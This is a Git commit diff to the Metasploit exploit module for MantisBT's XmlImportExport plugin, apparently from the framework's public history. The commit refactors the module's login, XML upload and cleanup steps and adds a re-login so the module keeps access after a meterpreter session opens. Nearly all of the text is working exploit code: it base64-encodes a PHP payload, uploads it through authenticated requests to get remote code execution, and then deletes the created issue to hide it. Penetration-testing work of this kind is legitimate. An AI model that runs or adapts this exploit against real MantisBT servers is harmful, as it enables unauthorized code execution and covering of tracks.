Fix by @firefart to recover communication with the application after a meterpreter session

itsecurityco · itsecurityco · commit ac17780f6d25 · 2014-11-11T05:49:18.000-05:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -52,26 +52,7 @@ def check
     end
   end
 
-  def exec_php(php_code, is_check = false)
-
-    # remove comments, line breaks and spaces of php_code
-    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
-
-    # clean b64 payload
-    while Rex::Text.encode_base64(payload_clean) =~ /=/
-      payload_clean = "#{ payload_clean } "
-    end
-    payload_b64 = Rex::Text.encode_base64(payload_clean)
-
-    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
-    rand_num = Rex::Text.rand_text_numeric(1, 9)
-
-    if is_check
-      timeout = 20
-    else
-      timeout = 3
-    end
-
+  def do_login()
     print_status("Checking access to MantisBT...")
     res = send_request_cgi({
       'method'   => 'GET',
@@ -86,13 +67,13 @@ def exec_php(php_code, is_check = false)
       return false
     end
 
-    cookies = res.get_cookies
+    @cookies = res.get_cookies
 
     print_status('Logging in...')
     res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path, 'login.php'),
-      'cookie'   => cookies,
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'cookie'    => @cookies,
       'vars_post' => {
         'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
         'username' => datastore['username'],
@@ -111,13 +92,24 @@ def exec_php(php_code, is_check = false)
       return false
     end
 
-    cookies = "#{ cookies } #{ res.get_cookies }"
+    @cookies = "#{ @cookies } #{ res.get_cookies }"
+  end
+
+  def upload_xml(payload_b64, rand_text, is_check)
+
+    if is_check
+      timeout = 20
+    else
+      timeout = 3
+    end
+
+    rand_num = Rex::Text.rand_text_numeric(1, 9)
 
     print_status("Checking XmlImportExport plugin...")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'plugin.php'),
-      'cookie'   => cookies,
+      'cookie'   => @cookies,
       'vars_get' => {
         'page' => 'XmlImportExport/import',
       }
@@ -206,23 +198,41 @@ def exec_php(php_code, is_check = false)
     data_post = data.to_s
 
     print_status("Sending payload...")
-    res = send_request_cgi({
+    return send_request_cgi({
       'method'  => 'POST',
       'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
-      'headers' => {
-        'Cookie' => cookies,
-      },
+      'cookie' => @cookies,
       'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
       'data'    => data_post,
     }, timeout)
+  end
+
+  def exec_php(php_code, is_check = false)
+
+    # remove comments, line breaks and spaces of php_code
+    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
+
+    # clean b64 payload
+    while Rex::Text.encode_base64(payload_clean) =~ /=/
+      payload_clean = "#{ payload_clean } "
+    end
+    payload_b64 = Rex::Text.encode_base64(payload_clean)
+
+    rand_text = Rex::Text.rand_text_alpha(5, 8)
 
-    res_payload = res
+    do_login()
+
+    res_payload = upload_xml(payload_b64, rand_text, is_check)
+
+    # When a meterpreter session is active, communication with the application is lost.
+    # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
+    do_login()
 
     print_status("Deleting the issue (#{ rand_text })...")
     res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'my_view_page.php'),
-      'cookie'   => cookies,
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'my_view_page.php'),
+      'cookie' => @cookies,
     })
 
     unless res && res.code == 200
@@ -240,7 +250,7 @@ def exec_php(php_code, is_check = false)
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
-      'cookie'   => cookies,
+      'cookie'   => @cookies,
       'vars_get' => {
         'bug_arr[]' => issue_id,
         'action' => 'DELETE',
@@ -257,7 +267,7 @@ def exec_php(php_code, is_check = false)
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
-      'cookie'   => cookies,
+      'cookie'   => @cookies,
       'vars_post' => {
         'bug_actiongroup_DELETE_token' => csrf_token,
         'bug_arr[]' => issue_id,
